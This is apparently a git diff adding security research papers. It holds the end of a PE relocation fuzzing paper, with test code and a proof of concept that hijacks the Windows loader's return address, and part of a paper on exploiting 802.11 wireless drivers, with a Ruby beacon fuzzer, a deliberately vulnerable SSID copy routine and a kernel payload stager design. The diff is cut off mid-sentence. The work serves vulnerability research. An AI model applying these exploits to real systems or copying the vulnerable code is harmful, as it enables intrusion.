+ +dumpbin.exe: Crashes as the result of apparently corrupt relocation blocks: + +DUMPBIN : fatal error LNK1000: + Internal error during + DumpBaseRelocations + + Version 8.00.50727.42 + + ExceptionCode = C0000005 + ExceptionFlags = 00000000 + ExceptionAddress = 00443334 + NumberParameters = 00000002 + ExceptionInformation[ 0] = 00000000 + ExceptionInformation[ 1] = 7FFA2000 + +CONTEXT: + Eax = 0000000A Esp = 0012E500 + Ebx = 00004F00 Ebp = 00000000 + Ecx = 7FFA2000 Esi = 00000000 + Edx = 781C3B68 Edi = 7FFA2000 + Eip = 00443334 EFlags = 00010293 + SegCs = 0000001B SegDs = 00000023 + SegSs = 00000023 SegEs = 00000023 + SegFs = 0000003B SegGs = 00000000 + Dr0 = 00000000 Dr3 = 00000000 + Dr1 = 00000000 Dr6 = 00000000 + Dr2 = 00000000 Dr7 = 00000000 + +A.4) Integer Overflows in Size Calculations + +A potential source of mistakes that could be made when processing relocations +has to do with the handling of the SizeOfBlock attribute of a relocation +block. There is a potential for an integer overflow to occur in applications +that don't properly handle situations where the SizeOfBlock attribute is less +than the size of the base relocation structure (which is 8 bytes). In order +to calculate the total number of fixups in a section, it's common to see a +calculation like (Block->SizeOfBlock - 8) / 2. However, if a check isn't made +to ensure that SizeOfBlock is at least 8, an integer overflow will occur. If +this happens, the application processing relocations would be tricked into +processing a very large number of relocations. An example of a test for this +issue is shown below: + +static VOID TestIntegerOverflow( + __in PPE_IMAGE Image, + __in PRELOC_FUZZ_CONTEXT FuzzContext) +{ + PRELOCATION_BLOCK_CONTEXT EvilBlock = AllocateRelocationBlockContext(0); + + EvilBlock->SizeOfBlock = 0; + EvilBlock->Rva = 0x1000; + + PrependRelocationBlockContext( + FuzzContext, + EvilBlock); +} + +In this example, a relocation block is created that has its SizeOfBlock +attribute set to zero. This is invalid because the minimum size of a block is +8 bytes. The results of this test against different applications are shown +below: + +ntdll.dll: Does not perform appropriate checks which appears to result in an +integer overflow: + +(9d4.6dc): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=00000000 ebx=00014008 ecx=00011000 edx=80010000 esi=00015000 edi=ffffffff +eip=7c91e163 esp=0013fa98 ebp=0013faac iopl=0 nv up ei pl nz na pe nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 +ntdll!LdrProcessRelocationBlockLongLong+0x1a: +7c91e163 0fb706 movzx eax,word ptr [esi] ds:0023:00015000=???? + +IDA: Ignores the relocation block, but may not process relocations correctly +as a result (unclear at this point). + +dumpbin.exe: Refuses to show relocations: + +Microsoft (R) COFF/PE Dumper Version 8.00.50727.42 +Copyright (C) Microsoft Corporation. All rights reserved. + +Dump of file foo.exe + +File Type: EXECUTABLE IMAGE + +BASE RELOCATIONS #4 + + Summary + + 1000 .data + 1000 .rdata + 1000 .reloc + 1000 .text + +A.5) Consistent Handling of Fixup Types + +Applications that process relocation fixups may also differ in their level of +support for different types of fixups. While most binaries today use the +HIGHLOW fixup exclusively, there are still quite a few other types of fixups +that can be applied. 
If differences in the way relocation fixups are +processed can be identified, it may be possible to create a binary that +relocates correctly in one application but not in another application. The +following code demonstrates an example of this type of test: + +static VOID TestConsistentRelocations( + __in PPE_IMAGE Image, + __in PRELOC_FUZZ_CONTEXT FuzzContext) +{ + PRELOCATION_BLOCK_CONTEXT Block = AllocateRelocationBlockContext(16); + ULONG Rva = FuzzContext->BaseRelocationSection->VirtualAddress; + INT Index; + + PrependRelocationBlockContext( + FuzzContext, + Block); + + Block->Rva = 0x1000; + + for (Index = 0; Index < 16; Index++) + { + // + // Skip invalid fixup types + // + if ((Index >= 6 && Index <= 8) || + (Index >= 0xb && Index <= 0x10)) + continue; + + Block->Fixups[Index] = (Index << 12) | Index; + } +} + +This test works by prepending a relocation block that contains a relocation +fixup for each different valid fixup type. This results in a relocation block +that looks something like this: + +BASE RELOCATIONS #4 + 1000 RVA, 28 SizeOfBlock + 0 ABS + 1 HIGH EC8B + 2 LOW 8BEC + 3 HIGHLOW 5008458B + 4 HIGHADJ 0845 (5005) + 0 ABS + 0 ABS + 0 ABS + 9 IMM64 + A DIR64 8000209C15FF8000 + 0 ABS + 0 ABS + 0 ABS + 0 ABS + 0 ABS + +The results for this test are shown below: + + +ntdll.dll: While not confirmed, it is assumed that the dynamic loader performs +all fixup types correctly. This results in the following code being produced +in the test binary: + +foo+0x1000: +00011000 55 push ebp +00011001 8c6c8b46 mov word ptr [ebx+ecx*4+46h],gs +00011005 895068 mov dword ptr [eax+68h],edx +00011008 1830 sbb byte ptr [eax],dh +0001100a 0100 add dword ptr [eax],eax +0001100c 00b69b200100 add byte ptr foo+0x209b (0001209b)[esi],dh +00011012 83c408 add esp,8 + +IDA: Appears to handle some relocation fixup types differently than the +dynamic loader. The result of IDA relocating the same binary results in the +following being produced: + +.text:00011000 push ebp +.text:00011001 mov ebp, esp +.text:00011003 mov eax, [ebp+9] +.text:00011006 shr byte ptr [eax+18h], 1 ; "Called TestFunction()\n" +.text:00011009 xor [ecx], al +.text:00011009 +.text:0001100B db 0 +.text:0001100C +.text:0001100C add byte ptr ds:printf[esi], dl +.text:00011012 add esp, 8 + +Equates to: + +.text:00011000 55 8B EC 8B 45 09 D0 68 18 30 01 00 00 96 9C 20 +.text:00011010 01 00 83 C4 08 C7 05 50 + +dumpbin.exe: N/A, dumpbin doesn't actually perform relocation fixups. + +A.6) Hijacking the Dynamic Loader + +Since the dynamic loader in previous tests proved to be capable of writing to +areas of memory external to the executable binary, it makes sense to test to +see if it's possible to hijack execution control. One method of approaching +this would be to have the dynamic loader apply a relocation to the return +address of the function used to process relocations. When the function +returns, it'll transfer control to whatever address the relocations have +caused it to point to. An example of this code for this test is shown below: + +static VOID TestHijackLoader( + __in PPE_IMAGE Image, + __in PRELOC_FUZZ_CONTEXT FuzzContext) +{ + PRELOCATION_BLOCK_CONTEXT Block = AllocateRelocationBlockContext(1); + + PrependRelocationBlockContext( + FuzzContext, + Block); + + // + // Set the RVA to the address of the return address on the stack taking into + // account the displacement. 
+ // + Block->Rva = 0x0012fab0; + Block->Fixups[0] = (3 << 12) | 0; +} + +When a binary is executed that contains this relocation block, the dynamic +loader ends up applying a relocation to the return address located at +0x13fab0. Obviously, this address may be subject to change quite frequently, +but as a means of illustrating a proof of concept it should be sufficient. +And, just as one would expect, the dynamic loader does indeed overwrite the +return address and make it possible to gain control of execution: + +(c88.184): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=0001400a ebx=00014008 ecx=0013fab0 edx=80010000 esi=00000001 +edi=ffffffff eip=fc92e10b esp=0013fac8 ebp=0013fae4 iopl=0 nv up ei pl zr na pe nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 +fc92e10b ?? ??? +0:000> kv +ChildEBP RetAddr Args to Child +WARNING: Frame IP not in any known module. Following frames may be wrong. +0013fac4 00010000 00261f18 7ffdc000 80010000 0xfc92e10b +0013fae4 7c91e08c 00010000 00000000 00000000 image00010000 +0013fb08 7c93ecd3 00010000 7c93f584 00000000 ntdll!LdrRelocateImage+0x1d (FPO: [Non-Fpo]) +0013fc94 7c921639 0013fd30 7c900000 0013fce0 ntdll!LdrpInitializeProcess+0xea0 (FPO: [Non-Fpo]) +0013fd1c 7c90eac7 0013fd30 7c900000 00000000 ntdll!_LdrpInitialize+0x183 (FPO: [Non-Fpo]) +00000000 00000000 00000000 00000000 00000000 ntdll!KiUserApcDispatcher+0x7 + +Bibliography + +[1] Carrera, Ero. Packer Tracing. + http://nzight.blogspot.com/2006/06/packer-tracing.html; + accessed Dec 15, 2006. + +[2] Szor, Peter. Advanced Code Evolution Techniques and Computer Virus Generator Kits. + http://www.informit.com/articles/article.asp?p=366890&seqNum=3&rl=1; + accessed Jan 8, 2007. + +[3] Szor, Peter. Tricky Relocations. + http://peterszor.com/resurrel.pdf; + accessed Jan 8, 2007. diff --git a/uninformed/6.3.txt b/uninformed/6.3.txt new file mode 100644 index 0000000..eb06b8a --- /dev/null +++ b/uninformed/6.3.txt @@ -0,0 +1,1570 @@ +Exploiting 802.11 Wireless Driver Vulnerabilities on Windows +11/2006 +Johnny Cache (johnycsh[a t]802.11mercenary.net) +H D Moore (hdm[a t]metasploit.com) +skape (mmiller[a t]hick.org) + +1) Foreword + +Abstract: This paper describes the process of identifying and exploiting +802.11 wireless device driver vulnerabilities on Windows. This process is +described in terms of two steps: pre-exploitation and exploitation. The +pre-exploitation step provides a basic introduction to the 802.11 protocol +along with a description of the tools and libraries the authors used to create +a basic 802.11 protocol fuzzer. The exploitation step describes the common +elements of an 802.11 wireless device driver exploit. These elements include +things like the underlying payload architecture that is used when executing +arbitrary code in kernel-mode on Windows, how this payload architecture has +been integrated into the 3.0 version of the Metasploit Framework, and the +interface that the Metasploit Framework exposes to make developing 802.11 +wireless device driver exploits easy. Finally, three separate real world +wireless device driver vulnerabilities are used as case studies to illustrate +the application of this process. It is hoped that the description and +illustration of this process can be used to show that kernel-mode +vulnerabilities can be just as dangerous and just as easy to exploit as +user-mode vulnerabilities. 
In so doing, awareness of the need for more robust +kernel-mode exploit prevention technology can be raised. + +Thanks: The authors would like to thank David Maynor, Richard Johnson, and +Chris Eagle. + +2) Introduction + +Software security has matured a lot over the past decade. It has gone from +being an obscure problem that garnered little interest from corporations to +something that has created an industry of its own. Corporations that once saw +little value in investing resources in software security now have entire teams +dedicated to rooting out security issues. The reason for this shift in +attitude is surely multifaceted, but it could be argued that the greatest +influence came from improvements to exploitation techniques that could be used +to take advantage of software vulnerabilities. The refinement of these +techniques made it possible for reliable exploits to be used without any +knowledge of the vulnerability. This shift effectively eliminated the already +thin crutch of barrier-to-entry complacency which many corporations were +guilty of leaning on. + +Whether or not the refinement of exploitation techniques was indeed the +turning point, the fact remains that there now exists an industry that has +been spawned in the name of software security. Of particular interest for the +purpose of this paper are the corporations and individuals within this +industry that have invested time in researching and implementing solutions +that attempt to tackle the problem of exploit prevention. As a result of this +time investment, things like non-executable pages, address space layout +randomization (ASLR), stack canaries, and other novel preventative measures +are becoming common place in the desktop market. While there should be no +argument that the main-stream integration of many of these technologies is a +good thing, there's a problem. + +This problem centers around the fact that the majority of these exploit +prevention solutions to date have been slightly narrow-sighted in their +implementations. In particular, these solutions generally focus on preventing +exploitation in only one context: user-mode. This is not true in all cases. +The authors would like to take care to mention that solutions like grsecurity +from the PaX team have had support for features that help to provide +kernel-level security. Furthermore, stack canary implementations have existed +and are integrated with many mainstream kernels. However, not all device +drivers have been compiled to take advantage of these new enhancements. The +reason for this narrow-sightedness is often defended based on the fact that +kernel-mode vulnerabilities have been far less prevalent. Furthermore, +kernel-mode vulnerabilities are considered by most to require a much more +sophisticated attack when compared with user-mode vulnerabilities. + +The prevalence of kernel-mode vulnerabilities could be interpreted in many +different ways. The naive way would be to think that kernel-mode +vulnerabilities really are few and far between. After all, this is code that +should have undergone rigorous code coverage testing. A second interpretation +might consider that kernel-mode vulnerabilities are more complex and thus +harder to find. A third interpretation might be that there are fewer eyes +focused on looking for kernel-mode vulnerabilities. While there are certainly +other factors, the authors feel that it is probably best captured by the +second and third interpretation. 
+ +Even if prevalence is affected because of the relative difficulty of +exploiting kernel-mode vulnerabilities, it's still a poor excuse for exploit +prevention solutions to simply ignore it. The past has already shown that +exploitation techniques for user-mode vulnerabilities were refined to the +point of creating increasingly reliable exploits. These increasingly reliable +exploits were then incorporated into automated worms. What's so different +about kernel-mode vulnerabilities? Sure, they are complicated, but so were +heap overflows. The authors see no reason to expect that kernel-mode +vulnerabilities won't also experience a period of revolutionary public +advancements to existing exploitation techniques. In fact, this period has +already started[5,2,1]. Still, most corporations seem content to lean on the same +set of crutches, waiting for proof that a problem really exists. It's hoped +that this paper can assist in the process of making it clear that kernel-mode +vulnerabilities can be just as easy to exploit as user-mode vulnerabilities. + +It really shouldn't come as a surprise that kernel-mode vulnerabilities exist. +The intense focus put upon preventing the exploitation of user-mode +vulnerabilities has caused kernel-mode security to lag behind. This lag is +further complicated by the fact that developers who write kernel-mode software +must generally have a completely different mentality relative to what most +user-mode developers are acustomed to. This is true regardless of what +operating system a programmer might be dealing with (so long as it's a +task-oriented operating system with a clear separation between system and +user). User-mode programmers who decide to dabble in writing device drivers +for NT will find themselves in for a few surprises. The most apparent thing +one would notice is that the old Windows Driver Model (WDM) and the new +Windows Driver Framework (WDF) represent completely different APIs relative to +what a user-mode developer would be familiar with. There are a number of +standard C runtime artifacts that can still be used, but their use in device +driver code stands out like a sore thumb. This fact hasn't stopped developers +from using dangerous string functions. + +While the API being completely different is surely a big hurdle, there are a +number of other gotchas that a user-mode programmer wouldn't normally find +themselves worrying about. One of the most interesting limitations imposed +upon device driver developers is the conservation of stack space. On modern +derivatives of NT, kernel-mode threads are only provided with 3 pages (12288 +bytes) of stack space. In user-mode, thread stacks will generally grow as +large as 256KB (this default limit is controlled by the optional header of an +executable binary). Due to the limited amount of kernel-mode thread stack +space, it should be rare to ever see a device driver consuming a large amount +of space within a stack frame. Nevertheless, it was observed that the Intel +Centrino drivers have multiple instances of functions that consume over 1 page +of stack space. That's 33% of the available stack space wasted within one +stack frame! + +Perhaps the most important of all of the differences is the extra care that +must be taken when it comes to dealing with things like performance, error +handling, and re-entrancy. These major elements are critical to ensuring the +stability of the operating system as a whole. 
If a programmer is negligent in +their handling of any of these things in user-mode, the worst that will happen +is the application will crash. In kernel-mode, however, a failure to properly +account for any of these elements will generally affect the stability of the +system as a whole. Even worse, security related flaws in device drivers +provide a point of exposure that can result in super-user privileges. + +From this very brief introduction, it is hoped that the reader will begin to +realize that device driver development is a different world. It's a world +that's filled with a greater number of restrictions and problems, where the +implications of software bugs are much greater than one would normally see in +user-mode. It's a world that hasn't yet received adequate attention in the +form of exploit prevention technology, thus making it possible to improve and +refine kernel-mode exploitation techniques. It should come as no surprise +that such a world would be attractive to researchers and tinkerers alike. + +This very attraction is, in fact, one of the major motivations for this paper. +While the authors will focus strictly on the process used to identify and +exploit flaws in wireless device drivers, it should be noted that other device +drivers are equally likely to be prone to security issues. However, most other +device drivers don't have the distinction of exposing a connectionless layer2 +attack surface to all devices in close proximity. Frankly, it's hard to +get much cooler than that. That only happens in the movies, right? + +To kick things off, the structure of this paper is as follows. In chapter 3, +the steps used to find vulnerabilities in wireless device drivers, such as +through the use of fuzzing, are described. Chapter 4 explains the process of +actually leveraging a device driver vulnerability to execute arbitrary code +and how the 3.0 version of the Metasploit Framework has been extended to make +this trivial to deal with. Finally, chapter 5 provides three real world +examples of wireless device driver vulnerabilities. Each real world example +describes the trials and tribulations of the vulnerability starting with the +initial discovery and ending with arbitrary code execution. + +3) Pre-Exploitation + +This chapter describes the tools and strategies used by the authors to +identify 802.11 wireless device driver vulnerabilities. Section 3.1 provides a +basic description of the 802.11 protocol in order to provide the +reader with information necessary to understand the attack surface that is +exposed by 802.11 device drivers. Section 3.2 describes the basic interface +exposed by the 3.0 version of the Metasploit Framework that makes it possible +to craft arbitrary 802.11 packets. Finally, section 3.3 describes a basic +approach to fuzzing certain aspects of the way a device driver handles certain +802.11 protocol functions. + +3.1) Attack Surface + +Device drivers suffer from the same types of vulnerabilities that apply to any +other code written in the C programming language. Buffer mismanagement, faulty +pointer math, and integer overflows can all lead to exploitable conditions. +Device driver flaws are often seen as a low risk issue due to the fact that +most drivers do not process attacker-controlled data. The exception, of +course, are drivers for networking devices. Although Ethernet devices (and +their drivers) have been around forever, the simplicity of what the driver has +to handle has greatly limited the attack surface. 
Wireless drivers are
+required to handle a wider range of requests and are also required to expose
+this functionality to anyone within range of the wireless device.
+
+In the world of 802.11 device drivers, the attack surface changes based on the
+state of the device. The three primary states are:
+
+   1. Unauthenticated and Unassociated
+   2. Authenticated and Unassociated
+   3. Authenticated and Associated
+
+In the first state, the client is not connected to a specific wireless
+network. This is the default state for 802.11 drivers and will be the focus
+for this section. The 802.11 protocol defines three different types of frames:
+Control, Management, and Data. These frame types are further divided into
+three classes (1, 2, and 3). Only frames in the first class are processed in
+the Unauthenticated and Unassociated state.
+
+The following 802.11 management sub-types are processed by clients while in
+state 1[3]:
+
+   1. Probe Request
+   2. Probe Response
+   3. Beacon
+   4. Authentication
+
+The Probe Response and Beacon sub-types are used by wireless devices to
+discover and advertise the local wireless networks. Clients can transmit Probe
+Requests to discover networks as well (more below). The Authentication
+sub-type is used to join a specific wireless network and reach the second
+state.
+
+Wireless clients discover the list of available networks in two different
+ways. In Active Mode, the client will send a Probe Request containing an
+empty SSID field. Any access point in range will reply with a Probe Response
+containing the parameters of the wireless network it serves. Alternatively,
+the client can specify the SSID it is looking for. In Passive Mode, clients
+will listen for Beacon frames and read the network parameters from within
+the beacon. Since both of these methods result in a frame that contains
+wireless network information, it makes sense for the frame format to be
+similar. The method chosen by the client is determined by the capabilities of
+the device and the application using the driver.
+
+A beacon frame includes a generic 802.11 header that defines the packet type,
+source, destination, Basic Service Set ID (BSSID) and other envelope
+information. Beacons also include a fixed-length header that is composed of a
+timestamp, beacon interval, and a capabilities field. The fixed-length header
+is followed by one or more Information Elements (IEs), which are
+variable-length fields and contain the bulk of the access point information.
+A probe response frame is almost identical to a beacon frame except that the
+destination address is set to that of the client whereas beacons set it to the
+broadcast address.
+
+Information elements consist of an 8-bit type field, an 8-bit length field,
+and up to 255 bytes of data. This type of structure is very similar to the
+common Type-Length-Value (TLV) form used in many different protocols. Beacon
+and probe response packets must contain an SSID IE, a Supported Rates IE, and
+a Channel IE for most wireless clients to process the packet.
+
+The 802.11 specification states that the SSID field (the human-readable name
+for a given wireless network) should be no more than 32 bytes long. However,
+the maximum length of an information element is 255 bytes. This leaves quite
+a bit of room for error in a poorly-written wireless driver. Wireless drivers
+support a large number of different information element types. The standard
+even includes support for proprietary, vendor-specific IEs. 
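+
+The kind of mistake this leaves room for can be illustrated with a short
+sketch. The routine and structure below are hypothetical and are not taken
+from any actual vendor driver; they simply show a driver trusting the
+attacker-controlled IE length field while copying an SSID into a buffer that
+is sized for the specification's 32-byte maximum:
+
+#include <string.h>
+
+typedef struct _HYPOTHETICAL_BSS_ENTRY {
+    unsigned char Ssid[32];       /* sized for a spec-conformant SSID */
+    unsigned char SsidLength;
+} HYPOTHETICAL_BSS_ENTRY;
+
+static void SaveSsidFromIe(HYPOTHETICAL_BSS_ENTRY *Entry,
+                           const unsigned char *Ie)
+{
+    unsigned char Length = Ie[1]; /* attacker-controlled, 0-255 */
+
+    /* BUG: no check that Length <= sizeof(Entry->Ssid), so an oversized
+       SSID IE overflows the fixed-size buffer. */
+    memcpy(Entry->Ssid, &Ie[2], Length);
+    Entry->SsidLength = Length;
+}
+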
+ +3.2) Packet Injection + +In order to attack a driver's beacon and probe response processing code, a +method of sending raw 802.11 frames to the device is needed. Although the +ability to send raw 802.11 packets is not a supported feature in most wireless +cards, many open-source drivers can be convinced to integrate support with a +small patch. A few even support it natively. Under the Linux operating +system, there is a wide range of hardware and drivers that support raw packet +injection. Unfortunately, each driver provides a slightly different interface +for accessing this feature. To support many different wireless cards, a +hardware-independent method for sending raw 802.11 frames is needed. + +The solution is the LORCON library (Loss of Radio Connectivity), written by +Mike Kershaw and Joshua Wright. This library provides a standardized interface +for sending raw 802.11 packets through a variety of supported drivers. +However, this library is written in C and does not expose any Ruby bindings by +default. To make it possible to interact with this library from Ruby, a new +Ruby extension (ruby-lorcon) was created that interfaces with the LORCON +library and exposes a simple object-oriented interface. This wrapper interface +makes it possible to send arbitrary wireless packets from a Ruby script. + +The easiest way to call the ruby-lorcon interface from a Metasploit module is +through a mixin. Mixins are used in the 3.0 version of the Metasploit +Framework to improve code reuse and allow any module to import a rich feature +set simply by including the right mixins. The mixin that exists for LORCON +provides three new user options and a simple API for opening the interface, +sending packets, and changing the channel. + ++-----------+----------+----------+--------------------------------------------+ +| Name | Default | Required | Description | ++-----------+----------+----------+--------------------------------------------+ +| CHANNEL | 11 | yes | The default channel number | +| DRIVER | madwifi | yes | The name of the wireless driver for lorcon | +| INTERFACE | ath0 | yes | The name of the wireless interface | ++-----------+----------+----------+--------------------------------------------+ + +A Metasploit module that wants to send raw 802.11 packets should include the +Msf::Exploit::Lorcon mixin. When this mixin is used, a module can make use +of wifi.open() to open the interface and wifi.write() to send packets. The user +will specify the INTERFACE and DRIVER options for their particular hardware +and driver. The creation of the 802.11 packet itself is left in the hands of +the module developer. + +3.3) Vulnerability Discovery + +One of the fastest ways to find new flaws is through the use of a fuzzer. In +general terms, a fuzzer is a program that forces an application to process +highly variant data that is typically malformed in the hopes that one of the +attempts will yield a crash. Fuzzing a wireless device driver depends on the +device being in a state where specific frames are processed and a tool that +can send frames likely to cause a crash. In the first part of this chapter, +the authors described the default state of a wireless client and what types of +management frames are processed in this state. + +The two types of frames that this paper will focus on are Beacons and Probe +Responses. 
These frames have the following structure:
+
+ +------+----------------------+
+ | Size | Description          |
+ +------+----------------------+
+ | 1    | Frame Type           |
+ | 1    | Frame Flags          |
+ | 2    | Duration             |
+ | 6    | Destination          |
+ | 6    | Source               |
+ | 6    | BSSID                |
+ | 2    | Sequence             |
+ | 8    | Timestamp            |
+ | 2    | Beacon Interval      |
+ | 2    | Capability Flags     |
+ | Var  | Information Elements |
+ | 2    | Frame Checksum       |
+ +------+----------------------+
+
+The Information Elements field is a list of variable-length structures
+consisting of a one byte type field, a one byte length field, and up to 255
+bytes of data. Variable-length fields are usually good targets for fuzzing
+since they require special processing when the packet is parsed. To attack a
+driver that uses Passive Mode to discover wireless networks, it's necessary to
+flood the target with mangled Beacons. To attack a driver that uses Active
+Mode, it's necessary to flood the target with mangled Probe Responses while
+forcing it to scan for networks. The following Ruby code generates a Beacon
+frame with randomized Information Element data. The Frame Checksum field is
+automatically added by the driver and does not need to be included.
+
+#
+# Generate a beacon frame with random information elements
+#
+
+# Maximum frame size (max is really 2312)
+mtu = 1500
+
+# Number of information elements
+ies = rand(1024)
+
+# Randomized SSID
+ssid = Rex::Text.rand_text_alpha(rand(31)+1)
+
+# Randomized BSSID
+bssid = Rex::Text.rand_text(6)
+
+# Randomized source
+src = Rex::Text.rand_text(6)
+
+# Randomized sequence
+seq = [rand(255)].pack('n')
+
+# Capabilities
+cap = Rex::Text.rand_text(2)
+
+# Timestamp
+tstamp = Rex::Text.rand_text(8)
+
+# Channel (a fixed value is assumed here; a real module would normally use
+# the CHANNEL option provided by the Lorcon mixin)
+channel = 11
+
+frame =
+ "\x80" + # type/subtype (mgmt/beacon)
+ "\x00" + # flags
+ "\x00\x00" + # duration
+ "\xff\xff\xff\xff\xff\xff" + # dst (broadcast)
+ src + # src
+ bssid + # bssid
+ seq + # seq
+ tstamp + # timestamp value
+ "\x64\x00" + # beacon interval
+ cap + # capabilities
+
+ # First IE: SSID
+ "\x00" + ssid.length.chr + ssid +
+
+ # Second IE: Supported Rates
+ "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
+
+ # Third IE: Current Channel
+ "\x03" + "\x01" + channel.chr
+
+# Generate random Information Elements and append them
+1.upto(ies) do |i|
+ max = mtu - frame.length
+ break if max < 2
+ t = rand(256)
+ l = (max - 2 == 0) ? 0 : (max > 255) ? rand(255) : rand(max - 1)
+ d = Rex::Text.rand_text(l)
+ frame += t.chr + l.chr + d
+end
+
+While this is just one example of a simple 802.11 fuzzer for a particular
+frame, much more complicated, state-aware fuzzers could be implemented that
+make it possible to fuzz other packet handling areas of wireless device
+drivers.
+
+4) Exploitation
+
+After an issue has been identified through the use of a fuzzer or through
+manual analysis, it's necessary to begin the process of determining a way to
+reliably gain control of the instruction pointer. In the case of stack-based
+buffer overflows on Windows, this process is often as simple as determining
+the offset to the return address and then overwriting it with an address of an
+instruction that jumps back into the stack. That's the best case scenario,
+though, and there are often other hurdles that one may have to overcome
+regardless of whether or not the vulnerability exists in a device driver or in
+a user-mode program. These hurdles and other factors are what tend to make
+the process of getting reliable control of the instruction pointer one of the
+most challenging steps in exploit development. 
Rather than exhaustively
+describing all of the problems one could run into, the authors will instead
+provide illustrations in the form of real world examples included in chapter 5.
+
+Assuming reliable control of the instruction pointer can be gained, the
+development of an exploit typically transitions into its final stage:
+arbitrary code execution. In user-mode, this stage has been completely
+automated for most exploit developers. It's become common practice to simply
+use Metasploit's user-mode payload generator. Kernel-mode payloads, on the
+other hand, have not seen an integrated solution for producing reliable
+payloads that can be dropped into any exploit. That's certainly not to say
+that there hasn't been previous work dealing with kernel-mode payloads, as
+there definitely has been[2,1], but its form up to now has been one that is not
+particularly easy to adopt. This lack of easy-to-use kernel-mode payloads can
+be seen as one of the major reasons why there has not been a large number of
+public, reliable kernel-mode exploits.
+
+Since one of the goals of this paper is to illustrate how kernel-mode exploits
+can be written just as easily as user-mode exploits, the authors determined
+that it was necessary to incorporate the existing set of kernel-mode payload
+ideas into the 3.0 version of the Metasploit framework where they could be
+used freely with any future kernel-mode exploits. While this final
+integration was certainly the end-goal, there were a number of important steps
+that had to be taken before the integration could occur. The following
+sections will attempt to provide this background. In section 4.1, the
+payload architecture that the authors selected is described in detail. This
+section also includes a description of the interface that has been exposed in
+the 3.0 version of the Metasploit Framework for developers who wish to
+implement kernel-mode exploits.
+
+4.1) Payload Architecture
+
+The payload architecture that the authors decided to integrate was based
+heavily on previous research[1]. As was alluded to in the introduction, there
+are a number of complicated considerations that must be taken into account
+when dealing with kernel-mode exploitation. A large majority of these
+considerations are directly related to what methods should be used when
+executing arbitrary code in the kernel. For example, if a device driver was
+holding a lock at the time that an exploit was triggered, what might be the
+best way to go about releasing that lock in order to recover the system so
+that it will still be possible to interact with it in a meaningful way? Other
+types of considerations include things like IRQL restrictions, cleaning up
+corrupted structures, and so on. These considerations lead to there being
+many different ways in which a payload might best be implemented for a
+particular vulnerability. This is quite a bit different from the user-mode
+environment where it's almost always possible to use the exact same payload
+regardless of the application.
+
+Though these situational complications do exist, it is possible to design and
+implement a payload system that can be applied in almost any circumstance. By
+separating kernel-mode payloads into variable components, it becomes possible
+to combine components together in different ways to form functional variations
+that are best suited for particular situations. 
In Windows Kernel-mode
+Payload Fundamentals [1], kernel-mode payloads are broken down into four
+different components: migration, stagers, recovery, and stages.
+
+When describing kernel-mode payloads in terms of components, the migration
+component would be one that is used to migrate from an unsafe execution
+environment to a safe execution environment. For example, if the IRQL is at
+DISPATCH when a vulnerability is triggered, it may be necessary to migrate to
+a safer IRQL such as PASSIVE. It is not always necessary to have a migration
+component. The purpose of a stager component is to move some portion of the
+payload so that it executes in the context of another thread. This
+may be necessary if the current thread is of critical importance or may lead
+to a deadlock of the system should certain operations be used. The use of a
+stager may obviate the need for a migration component. A recovery component
+is something that is used to restore the system to a clean state and then
+continue execution. This component is generally one that may require
+customization for a given vulnerability as it may not always be possible to
+describe the steps needed to recover the system in a generic way. For
+example, if locks were held at the time that the vulnerability was triggered,
+it may be necessary to find a way to release those locks and then continue
+execution from a safe point. Finally, the stage component is a catch-all for
+whatever arbitrary code may be executed once the payload is running in a safe
+environment.
+
+This model for describing kernel-mode payloads is what the authors decided to
+adopt. To better understand how this model works, it seems best to describe
+how it was applied for all three real world vulnerabilities that are shown in
+chapter 5. These three vulnerabilities actually make use of the same basic
+underlying payload, which will henceforth be referred to as ``the payload''
+for brevity. The payload itself is composed of three of the four components.
+Each of the payload components will be discussed individually and then as a
+whole to provide an idea of how the payload operates.
+
+The first component that exists in the payload is a stager component. The
+stager that the authors chose to use is based on the SharedUserData SystemCall
+Hook stager described in [1]. Before understanding how the stager works, it's
+important to understand a few things. As the name implies, the stager
+accomplishes its goal by hooking the SystemCall attribute found within
+SharedUserData. As a point of reference, SharedUserData is a global page that
+is shared between user-mode and kernel-mode. It acts as a sort of global
+structure that contains things like tick count and time information, version
+information, and quite a few other things. It's extremely useful for a few
+different reasons, not the least of which being that it's located at a fixed
+address in user-mode and in kernel-mode on all NT derivatives. This means
+that the stager is instantly portable and doesn't need to perform any symbol
+resolution to locate the address, thus helping to keep the overall size of the
+payload small.
+
+The SystemCall attribute that is hooked is part of an enhancement that was
+added in Windows XP. This enhancement was designed to make it possible to use
+optimized system call instructions depending on what hardware support is
+present on a given machine. Prior to Windows XP, system calls were dispatched
+from user-mode through the hardcoded use of the int 0x2e soft interrupt. 
Over
+time, hardware enhancements were made to decrease the overhead involved in
+performing a system call, such as through the introduction of the sysenter
+instruction. Since Microsoft isn't in the business of providing different
+versions of Windows for different makes and models of hardware, they decided
+to determine at runtime which system call interface to use. SharedUserData
+was the perfect candidate for storing the results of this runtime
+determination as it was already a shared page that existed in every user-mode
+process. After making these modifications, ntdll.dll was updated to dispatch
+system calls through SharedUserData rather than through the hardcoded use of
+int 0x2e. The initial implementation of this new system call dispatching
+interface placed executable code within the SystemCall attribute of
+SharedUserData. Subsequent versions of Windows, such as XP SP2, turned the
+SystemCall attribute into a function pointer.
+
+One important implication of the introduction of the SystemCall attribute
+to SharedUserData is that it represents a pivot point through which all system
+call dispatching occurs in user-mode. In previous versions of Windows, each
+user-mode system call stub routine invoked int 0x2e directly. In the latest
+versions, these stub routines make indirect calls through the SystemCall
+function pointer. By default, this function pointer is initialized to point
+to one of a few exported symbols within ntdll.dll. However, the implication
+of this function pointer being changed to point elsewhere is that it would
+be possible to intercept all system calls within all processes. This
+implication is what forms the very foundation for the stager that is used by
+the payload.
+
+When the stager begins executing, it's running in kernel-mode in the context
+of the thread that triggered the vulnerability. The first action it takes is
+to copy a chunk of code (the stage) into an unused portion of SharedUserData
+using the predictable address of 0xffdf037c. After the copy operation
+completes, the stager proceeds by hooking the SystemCall attribute. This hook
+must be handled differently depending on whether or not the target operating
+system is pre-XP SP2. More details on how this can be handled are
+described in [1]. Regardless of the approach, the SystemCall attribute is
+redirected to point to 0x7ffe037c. This predictable location is the user-mode
